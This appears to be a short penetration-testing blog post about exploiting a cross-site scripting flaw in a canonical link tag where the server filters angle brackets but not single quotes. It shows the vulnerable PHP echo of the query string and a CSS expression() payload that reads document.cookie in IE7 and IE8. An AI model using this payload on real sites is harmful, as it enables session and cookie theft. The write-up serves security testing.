Category Archives: pentests

Exploit XSS in <link rel=’canonical’> when characters < and > are filterred

In one of our customer’s website, the injection point is in <link rel=’canonical’ href=”> tag and it looks like something like

 <link rel=’cannoical’ href=’<?php echo $_SERVER[‘QUERY_STRING’];>’>

The server will encode <, > and “, if you try”<qss>, the response will be

<link rel="canonical" href=';&lt;qss&gt;' />

Under this case, using the following payload, you could exploit this XSS under IE7  and IE 8.’style=’x:expression(alert(document.cookie))’ t